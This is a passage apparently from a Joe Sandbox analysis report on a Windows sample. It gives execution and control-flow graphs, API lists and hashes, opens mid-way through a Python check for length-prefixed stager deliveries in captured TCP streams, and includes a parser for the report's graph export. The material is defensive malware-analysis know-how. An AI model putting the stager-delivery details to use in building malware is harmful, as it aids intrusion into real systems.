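    print(f"stager read {len(body)}/{length} bytes, complete={complete}")
    print("captured stream looks like a stage delivery:",
          extract_delivered_stage(wire + b"\x00" * 10) is not None)
    print("HTTP response misclassified:",
          extract_delivered_stage(b"HTTP/1.1 200 OK\r\n" + b"x" * 200) is not None)
```

The length-prefix check alone is a weak signal: a stream whose first DWORD happens to be a small number followed by at least that many bytes will match, so treat it as a triage filter for the non-standard-port TCP flows flagged in this report and confirm with the stage contents or the Yara hit on the process memory.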

                                                              Execution Graph

                                                              Execution Coverage:14.1%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph: the rendered execution graph (814 nodes, 20 limit nodes) was flattened into a node/edge list here and is not reproduced. Node labels are addresses in the 0x140000000 image followed by the APIs called from that node (or "N API calls" for collapsed callees). The path readable from the entry node 140001000 is: 140012060 (HeapCreate, TlsAlloc) -> 140012bf0 (HeapAlloc, HeapAlloc, TlsSetValue) -> 14000de20 -> 140011370 (HeapAlloc, HeapAlloc, InitializeCriticalSection) -> 14000c980 (HeapCreate) -> 14000c07c -> 14000b538 (memset, InitCommonControlsEx, CoInitialize) -> 140007160 (InitializeCriticalSection) -> 1400120d0 (HeapAlloc, HeapReAlloc, HeapFree) -> 14000ccd8 (32 API calls) -> 14000d524 (16 API calls) -> 14000d444 (11 API calls) -> 14000d524 -> 14000d444 -> 140011d30 (HeapAlloc, memset, HeapFree, HeapFree) -> 1400120d0 -> 14000d524 -> 14000d444 -> 14000c4d0 (RemoveVectoredExceptionHandler, AddVectoredExceptionHandler) -> 1400121c0 (GetLastError, TlsGetValue, SetLastError), twice -> 140004211 (31 API calls) -> 140012210 (TlsGetValue, HeapAlloc, HeapReAlloc) -> 1400021ea (50 API calls) -> 140001224 -> optionally 14000433f (188 API calls) -> 14000593c (232 API calls) -> 1400120a0 (HeapDestroy, TlsFree) -> 140001245 (HeapDestroy, ExitProcess). Other subgraphs in the listing cover the window and message loop (RegisterClassExW, CreateWindowExW, GetMessageW, TranslateAcceleratorW, DispatchMessageW, MessageBoxW), temp-file handling (CreateFileW, SetFilePointer, WriteFile), environment variables (GetEnvironmentVariableW, SetEnvironmentVariableW), exception unwinding (RtlLookupFunctionEntry, RtlVirtualUnwind), process termination (GetCurrentProcess, TerminateProcess), and wide/multi-byte string conversion (MultiByteToWideChar, WideCharToMultiByte).

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 4232179356-0
                                                              • Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
                                                              • Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
                                                              • Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000de50, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes):
                                                                94   14000de50-14000de9e   call 1400112a8        -> 97, 98
                                                                97   14000dea4-14000deb4                         -> 100, 101
                                                                100  14000deb6-14000dec7                         -> 102, 103
                                                                102  14000dec9                                   -> 103
                                                                103  14000decd-14000def6   CreateFileW           -> 106
                                                                101  14000defb-14000defe                         -> 104, 105
                                                                105  14000df00-14000df11                         -> 107, 108
                                                                107  14000df13                                   -> 108
                                                                108  14000df17-14000df40   CreateFileW           -> 106
                                                                104  14000df42-14000df46                         -> 109, 110
                                                                110  14000df48-14000df59                         -> 111, 112
                                                                111  14000df5b                                   -> 112
                                                                112  14000df5f-14000df8b   CreateFileW           -> 113, 115
                                                                115  14000df8d-14000dfb5   CreateFileW           -> 106
                                                                109  14000dfb7                                   -> 106
                                                                106  14000dfbc-14000dfc0                         -> 113, 114
                                                                113  14000dfc6-14000dfc9                         -> 114, 116
                                                                116  14000dfcf-14000dfd8                         -> 119, 120
                                                                120  14000dfda-14000dfdf                         -> 119, 121
                                                                121  14000dfe1-14000dff7   HeapAlloc             -> 122
                                                                119  14000dff9                                   -> 122
                                                                122  14000dffd-14000e02d                         -> 123, 124
                                                                124  14000e02f-14000e034                         -> 123, 125
                                                                125  14000e036-14000e047   SetFilePointer        -> 123
                                                                123  14000e04d-14000e05b                         -> 114, 118
                                                                114  14000e05d-14000e06f   call 1400111dc        -> 118
                                                                118  14000e074-14000e07c                         -> 99
                                                                99   14000e07f-14000e097                         -> (none)
                                                                98   14000e098-14000e09b                         -> 99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                                              • String ID:
                                                              • API String ID: 2685021396-0
                                                              • Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
                                                              • Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
                                                              • Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000593c, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes). Nine loop bodies share one call pattern, abbreviated below as [A] = call 1400121c0 *2, 140007c90, 140012210, 1400121c0, 140012450 *2, 140012210.
                                                                126  14000593c-14000593e                         -> 127
                                                                127  140005945-140005954                         -> 127, 128
                                                                128  140005956-140005979   call 1400123e0        -> 131
                                                                131  14000597b-140005987                         -> 132, 133
                                                                133  14000598d-140005a33   [A]                   -> 131, 132
                                                                132  140005a39-140005a53                         -> 135
                                                                135  140005a55-140005a61                         -> 137, 138
                                                                138  140005a67-140005b0d   [A]                   -> 135, 137
                                                                137  140005b13-140005b2d                         -> 141
                                                                141  140005b2f-140005b3b                         -> 144, 145
                                                                144  140005b41-140005be7   [A]                   -> 141, 145
                                                                145  140005bed-140005c07                         -> 149
                                                                149  140005c09-140005c15                         -> 153, 154
                                                                154  140005c1b-140005cc1   [A]                   -> 149, 153
                                                                153  140005cc7-140005ce1                         -> 159
                                                                159  140005ce3-140005cef                         -> 160, 161
                                                                161  140005cf5-140005d91   [A]                   -> 284
                                                                284  140005d96-140005d9b                         -> 159, 160
                                                                160  140005da1-140005dbb                         -> 168
                                                                168  140005dbd-140005dc9                         -> 175, 176
                                                                176  140005dcf-140005e79   [A]                   -> 168, 175
                                                                175  140005e7f-140005e99                         -> 184
                                                                184  140005e9b-140005ea7                         -> 192, 193
                                                                193  140005ead-140005f57   [A]                   -> 184, 192
                                                                192  140005f5d-140005f77                         -> 201
                                                                201  140005f79-140005f85                         -> 209, 210
                                                                210  140005f8b-140006035   [A]                   -> 201, 209
                                                                209  14000603b-140006055                         -> 219
                                                                219  140006057-140006063                         -> 228, 229
                                                                229  140006069-140006113   [A]                   -> 219, 228
                                                                228  140006119-14000657b   call 1400121c0, 140012450 *2, 140012210, 1400121c0 *2, 1400047e2, 140012210, 14000c2bc;
                                                                                           GetModuleHandleW;
                                                                                           call 1400121c0 *4, 140010ba0, 1400125d0, 140007dc0, 140012210, 1400121c0 *4, 140010ba0, 1400125d0, 140007dc0, 140012210, 140004134, 1400121c0 *2, 140002c46, 140006a58, 140001e57, 1400067aa, 1400121c0 *2, 14000ca70, 1400049ea, 140012210;
                                                                                           PathRemoveBackslashW;
                                                                                           call 140002bab, 1400121c0 *3, 140003cc9, 140012520, 1400125d0, 14000c45c, 140006a58, 1400121c0, 140012450 *2, 140012210, 1400121c0 *2, 1400026bb, 140012210, 140004ee2, 1400121c0, 140012450, 140012210;
                                                                                           PathQuoteSpacesW;
                                                                                           call 1400121c0, 140012450 *3, 140012210;
                                                                                           PathQuoteSpacesW                                                -> 428, 429
                                                                429  14000657d-14000659f   call 140007284        -> 432
                                                                428  1400065a1-1400065a6   call 140003ddc        -> 432
                                                                432  1400065ab-1400067a9   call 1400121c0 *2, 140012450 *3, 140012520, 1400121c0 *2, 14000daa8, 140012520, 1400121c0, 140012450 *2, 1400125d0 *3, 1400029c8, 140006a58, 140002930, 140012360 *10   -> (none)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                                              • String ID:
                                                              • API String ID: 2499486723-0
                                                              • Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
                                                              • Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
                                                              • Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FilePointermemmove
                                                              • String ID:
                                                              • API String ID: 2366752189-0
                                                              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                                              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                                              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000e3f0, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes):
                                                                509  14000e3f0-14000e404                         -> 510, 511
                                                                511  14000e40a-14000e40e                         -> 510, 512
                                                                512  14000e414-14000e418                         -> 513, 514
                                                                514  14000e41a-14000e423                         -> 516, 517
                                                                517  14000e425                                   -> 520
                                                                520  14000e430-14000e43a                         -> 520, 523
                                                                523  14000e43c-14000e450   call 14000e620        -> (none)
                                                                516  14000e451-14000e45b                         -> 516, 518
                                                                518  14000e45d-14000e482   WriteFile             -> (none)
                                                                513  14000e483-14000e4a6   call 14000e770        -> 521, 522
                                                                521  14000e4a8-14000e4b5                         -> 524, 525
                                                                525  14000e4b7-14000e4ba   call 14000e620        -> 530
                                                                530  14000e4bf-14000e4c3                         -> 528
                                                                524  14000e4c5-14000e4d6   WriteFile             -> 528
                                                                528  14000e4dc-14000e4e8   HeapFree              -> 522
                                                                522  14000e4ee                                   -> 510
                                                                510  14000e4f3-14000e4fd                         -> (none)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$FreeHeap
                                                              • String ID:
                                                              • API String ID: 74418370-0
                                                              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                                              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                                              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000e770, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes):
                                                                531  14000e770-14000e7b7   WideCharToMultiByte   -> 532, 533
                                                                532  14000e7b9-14000e7d6   HeapAlloc             -> 534, 535
                                                                535  14000e7d8-14000e801   WideCharToMultiByte   -> 534
                                                                534  14000e804                                   -> 536
                                                                536  14000e809-14000e81e                         -> (none)
                                                                533  14000e81f-14000e822                         -> 536
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocHeap
                                                              • String ID:
                                                              • API String ID: 3475569825-0
                                                              • Opcode ID: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction ID: ae5164d7e213c5423ce426761272d4060c1fe25f0e8d52ef4d31f29a04fa76ea
                                                              • Opcode Fuzzy Hash: 49eb562b8cb434ff95f7e7d63f5ecf434c56baadcc58e4f799a86c336de5446e
                                                              • Instruction Fuzzy Hash: D9112B72615B8082E754DF26B84435AB7A5FBC8BD0F148228EF9D63BA4DF38C5229704

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000d914, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes):
                                                                537  14000d914-14000d922                         -> 538, 539
                                                                538  14000d924-14000d95a   wcsncpy, wcslen       -> 540, 541
                                                                541  14000d95c-14000d96b                         -> 540, 543
                                                                543  14000d96d-14000d97b                         -> 540, 544
                                                                544  14000d97d-14000d988                         -> 540, 541
                                                                540  14000d98a-14000d99c   CreateDirectoryW      -> 542
                                                                539  14000d99e                                   -> 542
                                                                542  14000d9a0-14000d9a8                         -> (none)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectorywcslenwcsncpy
                                                              • String ID:
                                                              • API String ID: 961886536-0
                                                              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                                              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                                              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

                                                              Control-flow Graph

                                                              Basic blocks of the function at 14000b538, recovered from the report's control_flow_graph export (node, address range, calls made in the block, successor nodes):
                                                                545  14000b538-14000b573   memset, InitCommonControlsEx, CoInitialize   -> (none)
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CommonControlsInitInitializememset
                                                              • String ID:
                                                              • API String ID: 2179856907-0
                                                              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                                              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                                              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
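                                                              The control-flow graphs in this section come from Joe Sandbox's flattened control_flow_graph export of each function (node id, address range, annotations, then src->dst edges). The parser below is an added example, not code from Joe Sandbox or its IDA plugin; it assumes the token grammar visible in these dumps (decimal node id, hex address or address range, call <addr>, * N repeat count, bare imported API name, src->dst edge) and rebuilds blocks, edges and per-block API and call lists. The sample inputs are copied from the graphs of 14000e3f0 and 14000b538 above and from block 432 of the 14000593c graph, which exercises the repeat notation.

```python
"""Parse the flattened control_flow_graph text of a Joe Sandbox function listing
into basic blocks, edges and the calls made from each block. Added example; the
token grammar is inferred from the dumps on this page, not taken from Joe Sandbox."""
import re
from dataclasses import dataclass, field

NODE_RE = re.compile(r"^\d+$")                                  # graph node id
RANGE_RE = re.compile(r"^([0-9a-f]{8,})(?:-([0-9a-f]{8,}))?$")  # start[-end] address
ADDR_RE = re.compile(r"^[0-9a-f]{8,}$")                         # internal call target
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                         # src->dst edge
NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")               # imported API name


@dataclass
class Block:
    node: int
    start: int
    end: int
    apis: list = field(default_factory=list)   # imported APIs, in textual order
    calls: list = field(default_factory=list)  # internal call targets (hex strings)


@dataclass
class Graph:
    blocks: dict = field(default_factory=dict)  # node id -> Block
    edges: list = field(default_factory=list)   # (src, dst) node ids

    def entry_nodes(self):
        """Defined blocks with no incoming edge; normally only the function entry."""
        targets = {dst for _, dst in self.edges}
        return sorted(n for n in self.blocks if n not in targets)

    def api_sequence(self):
        """Imported API calls ordered by the address of the block that makes them."""
        ordered = sorted(self.blocks.values(), key=lambda b: b.start)
        return [api for b in ordered for api in b.apis]


def parse_cfg(text):
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    g, cur, last, i = Graph(), None, None, 0   # cur: block being annotated
    while i < len(tokens):                     # last: (list, item) for "* N"
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if (m := EDGE_RE.match(tok)):
            g.edges.append((int(m.group(1)), int(m.group(2))))
        elif NODE_RE.match(tok) and nxt and (r := RANGE_RE.match(nxt)):
            # "<node> <start>[-<end>]" opens a block; a lone address such as
            # "522 14000e4ee" is a single-instruction block.
            start = int(r.group(1), 16)
            end = int(r.group(2), 16) if r.group(2) else start
            cur = Block(int(tok), start, end)
            g.blocks[cur.node] = cur
            last = None
            i += 1
        elif tok == "call" and cur and nxt and ADDR_RE.match(nxt):
            cur.calls.append(nxt)
            last = (cur.calls, nxt)
            i += 1
        elif tok == "*" and last and nxt and NODE_RE.match(nxt):
            lst, item = last                   # "* N": previous item occurs N times
            lst.extend([item] * (int(nxt) - 1))
            i += 1
        elif cur and NAME_RE.match(tok):
            cur.apis.append(tok)
            last = (cur.apis, tok)
        else:
            raise ValueError(f"unexpected token {tok!r} at index {i}")
        i += 1
    return g


def summarize(text):
    """Compact view of one graph: size, entry node, APIs in address order, call targets."""
    g = parse_cfg(text)
    return {"blocks": len(g.blocks), "edges": len(g.edges), "entry": g.entry_nodes(),
            "apis": g.api_sequence(),
            "call_targets": sorted({c for b in g.blocks.values() for c in b.calls})}


# Sample inputs copied from this report: the full graph of 14000e3f0, the
# single-block graph of 14000b538, and block 432 of the 14000593c graph.
SAMPLE_WRITEFILE = (
    "control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e "
    "509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 "
    "514 14000e41a-14000e423 512->514 521 14000e4a8-14000e4b5 513->521 522 14000e4ee 513->522 "
    "516 14000e451-14000e45b 514->516 517 14000e425 514->517 516->516 518 14000e45d-14000e482 WriteFile "
    "516->518 520 14000e430-14000e43a 517->520 520->520 523 14000e43c-14000e450 call 14000e620 520->523 "
    "524 14000e4c5-14000e4d6 WriteFile 521->524 525 14000e4b7-14000e4ba call 14000e620 521->525 522->510 "
    "528 14000e4dc-14000e4e8 HeapFree 524->528 530 14000e4bf-14000e4c3 525->530 528->522 530->528"
)
SAMPLE_INIT = "control_flow_graph 545 14000b538-14000b573 memset InitCommonControlsEx CoInitialize"
SAMPLE_REPEAT = (
    "432 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 "
    "call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 "
    "call 140006a58 call 140002930 call 140012360 * 10 428->432 429->432"
)
```

                                                              Over the 14000e3f0 graph, summarize() reports 17 blocks, 22 edges, entry node 509 and the API order WriteFile, WriteFile, HeapFree, which is consistent with the API ID FileWrite$FreeHeap the report attaches to that function; the 14000593c fragment expands to 29 internal calls in block 432, ten of them to 140012360. Blocks that end with no successor in the export (such as 518 and 523 of 14000e3f0) are reported as they are, since the graph text does not say whether they return or jump out of the function.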

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$Value
                                                              • String ID:
                                                              • API String ID: 3898337583-0
                                                              • Opcode ID: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction ID: 13d1d2221b5dfffbe944c94766c5cf34ad854dcf92a9a233d77868c63a58341b
                                                              • Opcode Fuzzy Hash: 8fb7bdff1a5ea7f5a6416ebb7e65581105b868b3e6afb08efbefc70494558fec
                                                              • Instruction Fuzzy Hash: BA21A336609B40C6DA21CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CodeExitProcess
                                                              • String ID: open
                                                              • API String ID: 3861947596-2758837156
                                                              • Opcode ID: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction ID: e85bff13557fc8eee7e7e221a0258bb1a2e766680f88975b06e903b36e14beee
                                                              • Opcode Fuzzy Hash: b7feb277e73c6429ec278226bbe6df587e3a7ad8db4220ec3f4f0566a99c26d5
                                                              • Instruction Fuzzy Hash: 44315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                                                • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                                                • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                                                • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                                                • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                                                • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                                                • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
